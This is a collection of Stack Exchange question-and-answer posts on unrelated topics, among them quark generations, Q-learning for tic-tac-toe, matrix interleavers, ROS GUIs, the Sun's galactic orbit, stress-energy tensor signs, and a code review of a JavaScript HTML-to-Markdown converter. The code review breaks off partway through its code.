Question: Usually we arrange the quarks into 3 generations, depending on their mass. But for example, I can think various other ways to group the quarks. e.g. the $(charm,bottom,top)$ quarks don't seem to fit into a family since they have electric charges $Q=(+2/3,-1/3,+2/3)$ respectively. But one could postulate that they each have 2 more quantum numbers $R=(-1/3,+2/3,+2/3)$ and $S=(+2/3,+2/3,-1/3)$. And then they would form a symmetric family permuting the 3 quantum numbers $Q$ $R$ and $S$. One could do a similar thing for the $(down,up,stange)$ quarks. Therefor perhaps an equally valid way to group the quarks would be into 2 genetations. $(up,down,strange)$ and $(charm,bottom,top)$. With a broken symmetry caused by the photon being massles and hypothetical bosons corresponding to $R$ and $S$ charges being massive. Appart from the fact that there is no evidence (so far) of additional quantum numbers relating to the quarks. Is there any reason that we group the quarks into 3 genertions ordered by mass. (The "ordered by mass" seems very arbitrary). Or is it merely convention. It would be possible to do a similar trick arranging the 3+3 leptons and neutrinos into 2 generations. Answer: You may certainly arrange fermions any way that appeals to you and admire their properties, or try to discern numerological properties for their masses. But beware of theorists getting egg on their faces for three and a half decades in such efforts, which hardly discourages them... The point you are not acknowledging is that the present arrangement of fermions in generations in popular charts is a creature of history and convenience, not a logical necessity. See here. The generations must be such to represent triplicate superfluous replication of weak isodoublets, after suitable CKM/PMNS mixing rotations, and to expedite the obviousness of the gauge anomaly cancellations. Originally, for quarks, these mixing angles were "small", as these matrices are fatter in the diagonal (a fact exploited by Wolfenstein). If you chose to permute the up and the charmed quarks in their generation assignments, however, nobody would cringe, provided you adjusted the CKM matrix accordingly to yield the same electroweak coupling vertices to the charged vector bosons. (But ... people would hate you for superfluously writing something down so gratuitously unmemorable. GUT desperadoes have already been there.) The lepton arrangement is already stressful in that their flavor mixings are huge, so the present arbitrary assignment by mass is the most memorable. In fact, the linkage between specific quark generations to lepton generations is even weaker: you need not adjust any mixing matrices if you just permuted their first with their third generation, leaving quarks alone, etc... To sum up, the present middle-school chart grew historically as the heavier particles were being discovered and joined the chart, and of course, the neutrinos in it were given their placeholder names "lightest, medium, heaviest" precisely to obviate even knowing which is which, and relegating the issue to one of PMNS matrix labelling. Arranging fermions in different patters is as meaningful as the conclusions it motivates.
{ "domain": "physics.stackexchange", "id": 77337, "tags": "mass, standard-model, quarks" }
Why does a car need more torque when accelerating from rest?
Question: Since static friction helps in the movement of rolling motion, not opposes it, Why do we say we need more torque to get the car to move from rest if we have the rolling friction coefficient static and the torque = mass * acceleration * wheel radius, surely the mass and radius do not change. So, why do we need more torque at the starting of movement than at regular acceleration when the car is already moving? Answer: There are two factors I know of. First, and less important, overcoming static friction requires more force than kinetic friction. This applies to all of the internal parts that have to get going/moving past each other, and probably to the rolling friction of the tires. The major reason, though, has to do with how cars based on internal combustion engines work. See, an internal combustion engine can only supply torque and power when it's already moving. That's why you need an electric starter motor to get the engine going when you start the car. Now think about if the engine were linked directly to the wheels by gears - that would mean if the car is stopped, the engine isn't running. To get over this problem cars have a clutch inside of them that transmits the torque from the engine to the gear box and drive shaft. When the clutch is fully engaged, all of the torque and power are transmitted. As it is in the process of engaging, though, only part of the power is transmitted. This is especially important when starting from rest because it is that partial engagement that allows the wheels to come up to a speed that the engine can supply torque at without stopping. So, bottom line, the engine needs to be able to supply more torque at low rotation rates in order to get the car moving because not all of the power is being transmitted to the drive train by the clutch. With an electric motor this is not a problem - they can supply 100% of their torque even at zero rotation.
{ "domain": "physics.stackexchange", "id": 81993, "tags": "newtonian-mechanics, everyday-life, torque" }
Q learning Neural network Tic tac toe - When to train net
Question: This is another question I have on a q learning neural network being used to win tic tac toe, which is that im not sure i understand when to actually back propogate through the network. What i am currently doing is when the program plays through the game, if the number of game sets recorded has reached the max amount, every time the program makes a move, it will pick a random game state from its memory and back propagate using that game state and reward. this will then continue every time the program makes a move as the replay memory will always be full from then on. The association between rewards and game state and action from history, is that when a game has been completed, and the rewards have been calculated for each step, meaning that the total reward per step has been calculated, the method i use to calculate the reward is: Q(s,a) += reward * gamma^(inverse position in game state) in this case, gamma is a value predetermined to reduce the amount that the reward is taken into account the further you go back, and the inverse position in game state means that if there have been 5 total moves in a game, then the inverse position in game state when changing the reward for the first move would be 5, then for the second, 4, third 3 and so on. this just allows the reward to be taken less into account the earlier the move is. Should this allow the program to learn correctly? Answer: This update scheme: Q(s,a) += reward * gamma^(inverse position in game state) has a couple of problems: You are - apparently - incrementing Q values rather than training them to a reference target. As a result, the estimate for Q will likely diverge, predicting total rewards that are impossibly high or low. Although in your case with a zero sum game and initial random moves, it may just random walk around zero for a long time first. Ignoring the increment, the formula you are using is not from Q-learning, but effectively on policy Monte Carlo control, because you use the end-of-game sum of rewards as the Q value estimate. In theory, with a few tweaks this can be made to work, but it is a different algorithm than you say you want to learn. It is worth clarifying a few related terms (you clearly know these already, but I want to make sure you have them separated in your understanding of the rest of the answer): Reward. In RL, a reward (a real number) can be returned on every increment, after taking an action. The set of rewards is part of the problem definition. Often noted as $R$ or $r$. Return (aka Utility). The sum of all - maybe discounted - rewards from a specific point. Often noted as $G$ or $U$. Value, as in state value or action value. This is usually the expected return from a specific state or state, action pair. $Q(S_t, A_t)$ is the expected return when in state $S_t$ and taking action $A_t$. Note that using $Q$ does not make your algorithm Q-learning. The $Q$ action value is the basis for several RL algorithms. Your formula reward * gamma^(inverse position in game state) gives you the Return, $G$ seen in a sampled training game, $G_t = \gamma^{T-t} R_T$ where $T$ is the last time step in the game. That's provided the game only has a single non-zero reward at the end - in your case that is true. So you could use it as a training example, and train your network with input $S_t, A_t$ and desired output of $G_t$ calculated in this way. That should work. However, this will only find the optimal policy if you decay the exploration parameter $\epsilon$ and also remove older history from your experience table (because the older history will estimate returns based on imperfect play). Here is the usual way to use experience replay with Q learning: When saving experience, store $S_t, A_t, R_{t+1}, S_{t+1}$ - note that means storing immediate Reward, not the Return (yes you will store a lot of zeroes). Also note you need to store the next state. When you have enough experience to sample from, typically you do not learn from just one sample, but pick a minibatch size (e.g. 32) and train with that many each time. This helps with convergence. For Q-learning, your TD target is $R_{t+1} + \gamma \text{max}_{a'} Q(S_{t+1}, a')$, and you bootstrap from your current predictions for Q, which means: For each sample in the minibatch, you need to calculate the predicted Q value of all allowed actions from the next state $S_{t+1}$ - using the neutral network. Then use the maximum value from each state to calculate $\text{max}_{a'} Q(S_{t+1}, a')$. Train your network on the minibatch for a single step of gradient descent, with NN inputs $[S_t, A_t]$ and training label of the TD target from each example. Yes that means you use the same network to first predict and then learn from a formula based on those predictions. This can be a source of problems, so you may need to maintain two networks, one to predict and one that learns. Every few hundred updates, refresh the prediction network as a copy of the current learning network. This is quite common addition to experience replay (it is something that Deep Mind did for DQN), although may not be necessary in your case for a game as simple as Tic Tac Toe. The TD target is a bootstrapped and biased estimate of expected $G$. The bias is a potential source of problems (you may read that using NNs with Q-learning is not stable, this is one of the reasons why). However, with the right precautions, such as experience replay, the bias will reduce as the system learns. In case you are wondering, it is the use of both $S_t$ (as NN input) and $S_{t+1}$ (to calculate TD target) in the Q-learning algorithm, which effectively distributes the end-of-game reward back to the start of the game's Q value. In your case (and in many episodic games), it should be fine to use no discount, i.e. $\gamma = 1$ From your previous question, you noted that you were training two competing agents. That does in fact cause a problem for experience replay. The trouble is that the next state you need to train against will be the state after the opponent has made a move. So the opponent is technically viewed as being part of the environment for each agent. The agent learns to beat the current opponent. However, if the opponent is also learning an improved strategy, then its behaviour will change, meaning your stored experiences are no longer valid (in technical terms, the environment is non-stationary, meaning a policy that is optimal at one time may become suboptimal later). Therefore, you will want to discard older experience relatively frequently, even using Q-learning, if you have two self-modifying agents.
{ "domain": "datascience.stackexchange", "id": 2462, "tags": "machine-learning, neural-network, q-learning" }
Mechanics of a matrix Interleaver
Question: I am having trouble understanding exactly how the matrix interleaver. I have read the following page from MathWorks. In it, it gives the following example where "123456" is interleaved as "142536." Basically, it split every pair. Now, send the first packet as "123456" and 2nd packet as "142536" will allow one to correct any single deletions in each packet with the lower bound being 6 undecodable combinations(i.e. the same character is deleted in both packets). Now, this is fine for a single deletion, but what if there are more than one deletion in each packet, will the matrix interleaver take this into account and generate a different pattern? Is there a benefit to having one pattern over another? It seems interleaving is just increasing the entropy. So, consider the following 2 patterns: 142536 and 531642. I would argue that the 2nd pattern has more entropy as every 3 bits have no adjacent characters(e.g. 531, 316, 164, 642). Answer: We have different interleaving techniques, and matrix interleaving is one of them. But at the end all of them do one thing: interleaving is a technique to protect against burst errors (no matter how we do it). To make it more clear, you should consider the reason a packet cannot be decoded (and is failed at the receiver). Each packet usually contains a number of codewords (for example of length $N$). These codewords are actually generated by encoding messages of length $K$ by an $[N,K]$ forward error correction (FEC) code. A given FEC code has a limited correction capability (usually denoted by $t$) meaning that it cannot correct more than $t$ errors in each codeword. When a packet experiences fading, a large segment of packet might get corrupted. Eventually, there might be some codewords untouched by the fading while some others are fully influenced (which is called burst error). In such case, the codewords that experience fading might have more than $t$ errors. Since the packet is only accepted if all codewords have less than $t$ errors, this results in a packet failure. The objective by performing itrerleaving before FEC encoding and after FEC decoding is to distribute the errors evenly among different codewords. Hence, it becomes more likely for a packet to get accepted even if it experiences a "deep" fade. So Interleaving by itself is not used for error correction. It cannot change anything regarding the entropy either (since it only applies a permutation to the same random variables). It only helps to get a better efficiency from the FEC code when it faces burst errors.
{ "domain": "dsp.stackexchange", "id": 4233, "tags": "matrix, information-theory, channelcoding" }
Using ROS to create a GUI
Question: Hi, my name is Michel, i’m a student and I’ve been creating robots since I’m 15. I’m actually knew to ROS and it’s variety of tools, and I would like to know if there is an easy way to setup a graphical user interface (GUI) for my project: The project consits of a Raspberry Pi attached to an LCD Touch Screen, the RPi is connected to pressure sensors and reads the values each second… My problem is that I want to display a GUI on the LCD screen so that the user can read the sensor values in a table, as well as end the program whenever he wants. I tried using python TKinter to do it, but I think it’s a bit complicated since the main loop is constantly waiting for an “event” to happen (user interaction) thus not paying attention to sensor data coming up… Is there an easier way to do it? I mean it’s a very basic operation (print data on GUI and wait for Stop button) and I wondered maybe there’s a tool in ROS that could help me? Thanks in advance, Michel Originally posted by Mix_MicDev on ROS Answers with karma: 23 on 2022-03-31 Post score: 1 Answer: Hi, I was doing something similar few years ago and we decided to create an rqt plugin specifically for our robot/need where we can display data and provide input buttons for user. This would enable you to use also more advanced visualizations like rviz. If your robot/device is running ros, rqt plugins are very convenient solution. Originally posted by destogl with karma: 877 on 2022-04-03 This answer was ACCEPTED on the original site Post score: 1 Original comments Comment by Mix_MicDev on 2022-04-04: Thanks a lot for your answer! So you suggest creating a ui file with QT creator, and then converting it to an rqt_plugin? Is it possible to do this process using Python rather than c++ ? Comment by destogl on 2022-04-10: I don’t think you have to do anything with qt creator. Simply create an rqt plugin based on examples. If you want to do this with rqt, I think it is C++ only Comment by Mix_MicDev on 2022-04-11: Great, thanks! Do you recommend a specific tutorial for beginners? Comment by ljaniec on 2022-04-11: These places are good to start: http://wiki.ros.org/rqt/Tutorials and this page looks promising: https://fjp.at/ros/rqt-turtle/ + https://www.clearpathrobotics.com/assets/guides/kinetic/ros/Creating%20RQT%20Dashboard.html + http://wiki.ros.org/rqt/Plugins + http://wiki.ros.org/rqt Comment by Mix_MicDev on 2022-04-13: Great, thank you very much!!
{ "domain": "robotics.stackexchange", "id": 37546, "tags": "ros" }
Use of repeated numerical prefixes for substituents on methane
Question: Take trichloromethane for example. Is its preferred IUPAC name: 1,1,1-trichloromethane or simply trichloromethane And which is that rule in IUPAC that governs this naming? Thank you! Answer: According to Nomenclature of Organic Chemistry: IUPAC Recommendations and Preferred Names 2013, P-14.3.4.2 The locant '1' is omitted in substituted mononuclear parent hydrides. For the compound $\ce{CHCl3}$ (chloroform), the parent hydride is methane, which is mononuclear. Hence the locant '1' should be omitted in the preferred IUPAC name (PIN); it is simply trichloromethane.
{ "domain": "chemistry.stackexchange", "id": 9442, "tags": "organic-chemistry, nomenclature" }
NP-hard problems but only for n≥3
Question: 2-SAT is in P; 3-SAT is NP-complete. Exact cover by 2-sets is in P; exact cover by 3-sets is NP-complete Two-dimensional matching is in P; three-dimensional matching is NP-complete Graph 2-coloring is trivially in P; graph 3-coloring is NP-complete Are there other well-known or important examples that are similar, in that there is a family of problems with a natural parameter $n$, where the problem is known to be in P when $n<3$ and known to be NP-hard when $n≥3$? Answer: In graph coloring you are looking for a partitioning of the vertex set into independent sets. Now, there are many arguably well-known similarly behaving (i.e., easy for $k=2$, hard for $k \geq 3$) problems where instead you want to find a partition into $k$ sets which could be (i) independent dominating, (ii) dominating, (iii) total nearly perfect, (iv) weakly perfect dominating, or (v) total perfect dominating, to name a few. Many of these problems also appear under different shorter names like "domatic number", "total domatic number", and so on. For more details, see e.g., the work of Heggernes and Telle [1, Table 1] (there's quite a bit of follow-up work as well). Also, graph coloring is naturally linked to the classical and heavily-studied chromatic index (i.e., edge coloring) via the line graph. Further, deciding if a $k$-regular graph can be edge $k$-colored properly is NPC for every $k \geq 3$. [1] Heggernes, Pinar, and Jan Arne Telle. "Partitioning graphs into generalized dominating sets." Nord. J. Comput. 5.2 (1998): 128-142.
{ "domain": "cs.stackexchange", "id": 15029, "tags": "np-complete" }
Is the Sun prograde or retrograde with respect to the rotation of the Milky Way?
Question: I recently learned about the terms prograde and retrograde. I've seen these terms used to describe the rotations and orbits of moons with respect to their planet, and planets with respect to their star. But I haven't been able to find what the relationship is between the rotation and orbit of the Sun with respect to the rotation of the Milky Way. So, basically what I'm trying to do here is ask two questions: Is the orbit of the Sun around the center of the Milky Way prograde or retrograde with respect to the rotation of the Milky Way? Is the axial rotation of the Sun prograde or retrograde with respect to the rotation of the Milky Way? Regarding question #2, I know it might be considered a slightly weird question to ask, simply because the plane of the Solar System is significantly tilted relative to the plane of the Milky Way (by about 60°), and furthermore the Sun itself has its equatorial plane tilted by a few more degrees relative to the plane of the Solar System (about 7°). But if we mentally "flatten out" the Solar System such that the Sun's equatorial plane aligns with the plane of the Milky Way, then we can talk about whether its axial rotation is in the same direction as the rotation of the Milky Way, so I think this is a valid application of the concept. Answer: Prograde. This is usually the case for stars in spiral galaxies outside the most central regions. A galaxy can be either rotation-dominated or dispersion-dominated, depending on whether its kinematics is dominated by ordered or random motion. Spiral galaxies such as the Milky Way belong to the first class, while ellipticals belong to the second. Irregular galaxies can be somewhere in between, with random motions but with an overall rotation. In spirals, stars and gas generally rotate in the same direction (although they can have more random motion in their bulges, i.e. in the central parts). The Sun follows the overall rotation of the Milky Way, except for roughly 20 km/s in the direction wrt. the overall rotation; this direction is known as the Solar apex. However, following a major merger event, the product can be two kinematically decoupled components. This is described well in Corsini (2014). Such a merger is required to perturb the system sufficiently. On smaller scales, however, the turbulence of the gas clouds giving birth to stars are more random. Hence the rotation of a star may very well be in another direction than the overall disk rotation. As you say, the plane of the Solar System is tilted by 63º wrt. the plane of the Milky Way, in the direction that the Sun is traveling. This can be seen e.g. in this infrared IRAS image, where the angle between the bright Milky Way disk and the blue stripes — which is emission from dust in the plane of the Solar System — crosses at roughly 60º: credit: Caltech. The rotation of the Sun is also prograde wrt. the Milky Way (or else we would say that the tilt was 180º – 63º = 117º).
{ "domain": "astronomy.stackexchange", "id": 2697, "tags": "the-sun, orbit, milky-way, rotation" }
Why only perpendicular or parallel forces are counted?
Question: Usually in physics, we take components of a vector (let's say force) to find the answer. Eg:- while finding force to calculate torque we find Fsin(theta) There are numerous such examples where we take a component of force to get a vector which either perpendicular (sine) or parallel to the surface. But technically force is a push or pull so it shouldn't really matter if we take non perpendicular force. Then why is it necessary to calculate the components of forces?. Answer: Then why is it necessary to calculate the components of forces?. The short answer is we may need to calculate the vertical and/or horizontal components of a force to determine what the force does. But technically force is a push or pull so it shouldn't really matter if we take non perpendicular force. See the diagram below of a box on a surface with friction. Say we want to know how much work the force $F$ does moving the box a distance $d$ against friction. We can't determine this unless we calculate both the vertical and horizontal components of $F$. We need to know the vertical component ($F$ sin θ) because this, together with the weight of the box ($mg$) will give us the force normal to the surface, $N$. We need $N$ to determine the kinetic friction force $f$. Then we need to now the horizontal component of $F$ ($F$ cos θ) because this, with the friction force $f$ will give us the net force acting in the horizontal direction. That net force times the distance the box moves gives us the work done by $F$. Hope this helps.
{ "domain": "physics.stackexchange", "id": 65825, "tags": "newtonian-mechanics, forces, rotational-dynamics, vectors, torque" }
How is the number of measurement outcomes linked to the rank of the observable?
Question: I am thinking about the following question: Assuming that we have some given state $\rho$ and we perform a measurement with $k$ outcomes on this state. Then we can describe the measurement in outcomes as eigenvalues of the measurable, i.e., the Hermitian operator that I denote by $D$, with probabilities $\mathrm{Tr}[D_i\rho]$, where $D_i$ are the projectors in the $i^{th}$ eigenspace of $D$, i.e. for the eigendecomposition $D = \sum_i \lambda_i s_i s_i^T = \sum_i \lambda_i D_i$. I was wondering if my assumption is true. If the number of (distinguishable?) outcomes for any Hermitian operator is given by $k$ i.e. then we have only $k$ non-zero eigenvalues and hence $D$ must be of rank $\leq k$? Answer: You are implicitly making a specific assumption here: that the $\{D_i\}$ are rank 1 projectors. If your $\{D_i\}$ are rank-1 projectors, i.e. taking the form $D_i=s_is_i^T$, then because there is a completeness relation for measurement operators, $$ \sum_iD_i=\mathbb{I}, $$ then you must have a number of outcomes equal to the dimension of the Hilbert space you're measuring. Call that $k$. Now, if you define $D=\sum_i\lambda_iD_i$ where the $\lambda_i$ are distinct, then $D$ must have rank either $k$ or $k-1$: if one of the $\lambda_i$ is 0, then the number of non-zero values (which is equivalent to the rank) is $k-1$. Now, strictly, the $D_i$ could be projectors, but not have rank 1 (in fact, they don't even have to be projectors, but we won't go there...), but instead a rank $r_i=\text{Tr}(D_i)$. In this case, either $D$ is full rank (which we'll still call $k$) or, if a particular $\lambda_j=0$, then it has rank $k-r_j$, because that's the number of non-zero eigenvalues $D$ has. Here, the number of distinguishable outcomes is potentially much smaller than the rank of $D$. All you really know is that $\text{rk}(D)\geq |\{D_i\}|-1$ (i.e. the number of measurement operators minus 1, in case one of the eigenvalues is 0). But that could be a very loose bound in some circumstances (and the bound is the opposite way round to what you were asking). Overall, the answer is that the number of distinguishable measurement outcomes is not equal to the rank of the measurement operator.
{ "domain": "quantumcomputing.stackexchange", "id": 176, "tags": "measurement" }
Sign crazyness on the stress energy tensor?
Question: I would like to know on what depends the sign of the stress energy tensor in the following formula : $T_{\mu\nu}=\pm(\rho c^2+P)u_{\mu}u_{\nu} \pm P g_{\mu\nu}$ In my case the metric is equal to $g_{\mu\nu}=\pmatrix{-c^2 & 0 & 0 & 0\\0 & 1 & 0 & 0\\0 & 0 & 1 & 0\\0 & 0 & 0 & 1}$ and $\rho$ is the mass density. The problem is that we have: Wikipedia Stress-energy tensor: $T^{\mu\nu}=(\rho c^2+P)u^{\mu}u^{\nu} + P g^{\mu\nu}$ Tenseur énergie-impulsion: $T^{\mu\nu}=-(\rho c^2+P)u^{\mu}u^{\nu} + P g^{\mu\nu}$ Energie-Impuls-Tensor: $T^{\mu\nu}=(\rho c^2+P)u^{\mu}u^{\nu} - P g^{\mu\nu}$ Fluide parfait: $T^{\mu\nu}=(\rho c^2+P)u^{\mu}u^{\nu} - P g^{\mu\nu}$ Dérivation des équations de Friedmann: $T_{\mu\nu}=(\rho c^2+P)u_{\mu}u_{\nu} - P g_{\mu\nu}$ So why so many different signs, and what are the right ones in my case ? Answer: First off, please don't use units with $c\ne 1$ in GR. It makes everything horribly messy. What we normally think of as a ruler or clock measurement is represented in GR by an upper index quantity like $\Delta x^\mu$. Therefore in a Cartesian coordinate system in the fluid's rest frame, we are guaranteed that $u^\mu=(1,0,0,0)$, not $(-1,0,0,0)$. This is independent of the choice of signature or other signs. For this reason, it's better to express everything in the upper-index form, not the lower-index form that that you gave. Let $T^{\mu\nu}=s_1(\rho+P)u^{\mu}u^{\nu} +s_2 P g^{\mu\nu}$, where $s_1=\pm 1$ and $s_2=\pm 1$. We want the time-time component of T in the fluid's rest frame to depend only on $\rho$, not $P$. For people who use a metric with signature $(-,+,+,+)$, this requires $s_1=s_2$. For people who use $(+,-,-,-)$, it requires $s_1=-s_2$. In addition to choices of signature, the GR literature is blessed with several other arbitrary sign conventions that are not consistent from one author to another. MTW has a handy table of these on a page in the back of the book. For example, the Einstein field equations may be written $G=8\pi T$ or $G=-8\pi T$. The Einstein and Riemann tensors can also be defined with either sign. I think this explains the difference between #2 and #3-5 on your list. The English Wikipedia articles on GR were almost all originally written by one guy, Chris Hillman, so they probably all follow a consistent sign convention. Clearly the French and German wikipedias don't follow the same sign conventions as the English one, and the French wikipedia doesn't seem to be internally consistent.
{ "domain": "physics.stackexchange", "id": 7562, "tags": "general-relativity, tensor-calculus, stress-energy-momentum-tensor, conventions" }
C program to print input longer than 10 characters
Question: The program will read the user's input, if it's longer or equal to 10 characters, it will print it. It's pretty compact and works fine. #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX_SIZE 1000 int main(void){ char line[MAX_SIZE]; int length; /*String length*/ while((fgets(line, sizeof(line), stdin) != NULL)){ line[length = (strlen(line)-1)] = '\0'; /*Remove the \n character*/ if(length >= 10){ printf("%s\n", line); } } return 0; } Not looking for anything specific, method, style, etc.. Answer: Wrong functionality. line[length = (strlen(line)-1)] always truncates line[] even if it does not end with a '\n', so /*Remove the \n character*/ is not correct. Avoid a hacker exploit. What happens when line[0] == 0? Injecting a null character as part of stdin is not easy, but doable. while((fgets(line, sizeof(line), stdin) != NULL)){ line[length = (strlen(line)-1)] = '\0'; // danger fgets() treats a null character just like any non-'\n' characters. So if the first character read is a null character, then strlen(line) is (size_t) 0 line[length = ((size_t) 0 - 1)] line[length = (SIZE_MAX)] = ... // access outside array bounds --> UB The solution is to test the length or use strcspn() size_t length = strlen(line); if (length > 0 && line[length - 1] == '\n') line[--length] = '\0'; // or line[strcspn(line, "\n")] = '\0'; Code does not consume the remainder of the line, should it have more than MAX_SIZE - 1 characters in it. Failure to consume the rest of the line causes the next iteration of the loop to pick-up on the old line resulting in erroneousness reports. Entering a line of MAX_SIZE + 10 characters will demonstrate the problem. Staying with fgets() (assumed requirement else consider fgetc()) does pose limitations, like trouble detecting null characters, yet aside from that: while((fgets(line, sizeof line, stdin) != NULL)){ bool eol_missing = true; size_t length = strlen(line); if (length > 0 && line[length - 1] == '\n') { eol_missing = false; line[--length] = '\0'; } if (length >= 10) { printf("%s", line); // or fputs() } if (eol_missing) { // consume rest of the line int ch; while ((c = fgetc(stdin)) != '\n' && ch != EOF) { fputc(ch, stdout); // or putchar() } } printf("\n"); // or putchar(), puts(), etc. } return 0; Pedantic code would check if (length >= 10) fputc(ch, stdout); (pesky embedded null characters again.) and once a line was read, look for a rare input error with ferror() before calling fgetc(). If null characters in a line are a real concern for correct functionality, fgets() is not the function to use. -- Minor: Extra outside () // v----------------------------------------v while((fgets(line, sizeof(line), stdin) != NULL)){ // could use while (fgets(line, sizeof(line), stdin) != NULL) { // or while (fgets(line, sizeof line, stdin) != NULL) { // or even while (fgets(line, sizeof line, stdin)) {
{ "domain": "codereview.stackexchange", "id": 24765, "tags": "c" }
HTML to Markdown converter
Question: I've made a simple HTML→Markdown converter in Javascript and am looking for any feedback. For now, I've basically used Stack Exchange's /editing-help as a guide as to what to convert, but I might look at CommonMark's spec later on. It uses DOMParser() and then goes through the child nodes to convert things. My test HTML string right now is: <h1>h1</h1> <br> <h2>h2</h2> <br> <h3>h3</h3> <br>text outside everything <br> <h2>(and another element!)</h2> <br> <img src='http://example.com/example.png'> <br><a href='http://google.com'>a link!</a> <br> <ul> <li>item 1</li> <li>item 2</li> <li>item 3</li> </ul> <br> <ol> <li>item 1</li> <li>item 2</li> <li>item 3</li> </ol> <br><strong>BOLD TEXT</strong> and <i>ITALICISED TEXT</i> <br> <blockquote>blockquote</blockquote> <br> and that conversion 'works': # h1 ## h2 ### h3 text outside everything ## (and another element!) ![enter image description here](http://example.com/example.png) [a link!](http://google.com) - item 1 - item 2 - item 3 1. item 1 2. item 2 3. item 3 **BOLD TEXT** and *ITALICISED TEXT* > blockquote Code var str = "<h1>h1</h1> <br>" str += "<h2>h2</h2> <br>"; str += "<h3>h3</h3> <br>"; str += "text outside everything <br>"; str += "<h2>(and another element!)</h2> <br>" str += "<img src='http://example.com/example.png'> <br>"; str += "<a href='http://google.com'>a link!</a> <br>"; str += "<ul><li>item 1</li><li>item 2</li><li>item 3</li></ul> <br>"; str += "<ol><li>item 1</li><li>item 2</li><li>item 3</li></ol> <br>"; str += "<strong>BOLD TEXT</strong> and <i>ITALICISED TEXT</i> <br>"; str += "<blockquote>blockquote</blockquote>"; var doc = new DOMParser().parseFromString(str, 'text/html'); var childnodes = doc.body.childNodes; var markdown = ''; var conversions = { br: function(data) { return '\n\n'; }, h1: function(data) { return '# ' }, h2: function(data) { return '## '; }, h3: function(data) { return '### '; }, hr: function(data) { return '---\n'; }, blockquote: function(data) { return '> '; }, img: function(data) { var imgStr = "![alt text](" + data.curEl.src + ")"; return imgStr; }, a: function(data) { return "[" + data.html + "](" + data.curEl.getAttribute('href') + ")"; }, ul: function(data) { var lis = childnodes[data.i].childNodes; var newmd = ''; var lislength = lis.length; for (var x = 0; x < lislength; x++) { newmd += "- " + lis[x].innerHTML + "\n"; } return newmd; }, ol: function(data) { var lis = childnodes[data.i].childNodes; var counter = 1; var newmd = ''; var lislength = lis.length for (var x = 0; x < lislength; x++) { newmd += counter + ". " + lis[x].innerHTML + "\n"; counter++; } return newmd; }, strong: function(data) { return "**" + data.html + "**"; }, i: function(data) { return "*" + data.html + "*"; } }; function convertToMarkdown(curEl, html, tag, i) { if (tag == undefined) { //for text nodes markdown += curEl.textContent; } else { tag = tag.toLowerCase(); console.log(tag); markdown += conversions[tag]({ curEl: curEl, html: html, tag: tag, i: i }) + (['ul', 'ol', 'i', 'strong', 'a'].indexOf(tag) > -1 ? '' : html); } } var length = childnodes.length; for (var i = 0; i < length; i++) { var curEl = childnodes[i], html = childnodes[i].innerHTML, tag = childnodes[i].tagName; convertToMarkdown(curEl, html, tag, i); } console.log(markdown); (you can check the output yourself in the console) Main Questions: Is my code readable? How can I make it more so? Is there a cleaner way to do any part of this? Answer: Your code isn't that much re-usable. I can't include it in a file and call it since I could easily break it from anywhere. What I suggest is that you wrap it in the following block: (function(window, undefined){ 'use strict'; [code] })(Function('return this')()); This will protect your code in so many ways: You guarantee that the window object is the window You guarantee that undefined is really undefined You can be 100% sure that there won't be variables on the global scope All variables are local (looks the same, but it is a tiny bit different) The possibility of a script screwing up your code is null. And this takes what? 1 minute? And you have to change almost nothing! You will notice the 'use strict;' there. You may be alienated by it. This has been re-re-re-re-re-re-itterated here. Using it adds some security features and prevent some 'stupid' bloopers and other mistakes and distractions. You can read about it in greater detail on MDN's page. You currently are writting everything into the markdown variable. Before going any further, let me take the liberty to teach you about the amazing return statement: When a return statement is called in a function, the execution of this function is stopped. If specified, a given value is returned to the function caller. If the expression is omitted, undefined is returned instead. Source: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/return Inside your convertToMarkdown() function, instead of cramming it all into that variable, use a return. Inside the same function, you have the following: if (tag == undefined) { //for text nodes markdown += curEl.textContent; } else { Which isn't fine. It is too complex to explain in less than 20k characters, but that piece must be gone! I'll show how later on. One of the problems with this is also that you are using .textContent. That isn't much compatible with other "browsers" (*cough* IE *cough*). The most compatible method is by using .innerText. But Firefox now decided that it wouldn't support it. Fear not, just add this line at the top: var TEXT_PROPERTY = document.head.innerText ? 'innerText' : 'textContent'; And use it like curEl[TEXT_PROPERTY] to get the text content. Instead of re-creating a parser object, you can simply create a <div>, keep it in memory, and use it to extract the elements. Setting the .innerHTML of that element will have the same effect than the parser, but faster. You then have access to tons of tools readily available on DOM elements. Your choice of newlines is quite weird. Browsers will all the time convert them to \r\n. You can use it, since you know what to expect. Imagine what would be to write \n and get \r\n instead. That would drive some guys insane! On your conversions object, you have methods that have 1 argument, but use it for nothing. You could just drop that useless argument. Done. And now, my promised alternative: (function(window, undefined){ 'use strict'; var TEXT_PROPERTY = document.head.innerText ? 'innerText' : 'textContent'; var NEWLINE = '\r\n'; var indent = function(text){ return text.replace(/(\r\n|\r|\n)/g,'$1 '); }; var conversions = { BR: function(){ return ' ' + NEWLINE; }, P: function(elem) { return NEWLINE + NEWLINE + elem.innerHTML + NEWLINE; }, H1: function(elem) { return '# ' + elem.innerHTML + NEWLINE; }, H2: function(elem) { return '## ' + elem.innerHTML + NEWLINE; }, H3: function(elem) { return '### ' + elem.innerHTML + NEWLINE; }, HR: function() { //we use 4 to do not cause confusion with <strike></strike> return '----' + NEWLINE; }, BLOCKQUOTE: function(elem) { return '> ' + elem .innerHTML .replace( /(\r\n|\r|\n)/g, '$1> ' ); }, IMG: function(elem) { return '![alt text](' + elem.src + ')'; }, A: function(elem) { return '[' + elem.innerHTML + '](' + elem.href + ')'; }, UL: function(elem) { var li = elem.children; var length = li.length; var md = ''; for (var i = 0; i < length; i++) { md += ' - ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, OL: function(elem) { var li = elem.children; var length = li.length; var md = ''; var start = elem.start|0; for (var i = 0; i < length; i++) { md += (i + start) + '. ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, B: function(elem) { return '**' + elem.innerHTML + '**'; }, STRONG: function(elem) { return this.B(elem); }, STRIKE: function(elem) { return '---' + elem.innerHTML + '---'; }, DEL: function(elem) { return this.STRIKE(elem); }, I: function(elem) { return '*' + elem.innerHTML + '*'; }, PRE: function(elem){ return indent(this.innerHTML) + NEWLINE; }, CODE: function(elem){ if(elem.parentNode.tagName != 'PRE') { return '``' + elem.innerHTML.replace(/\r|\n/g,'').replace(/^\s*(.*)\s*$/,'$1') + '``'; } else { this.PRE(elem); } } }; var toMarkdown = function(html){ var DIV = document.createElement('div'); //will have the HTML to parse. DIV.innerHTML = html + ''; for(var tag in conversions) { var elements = 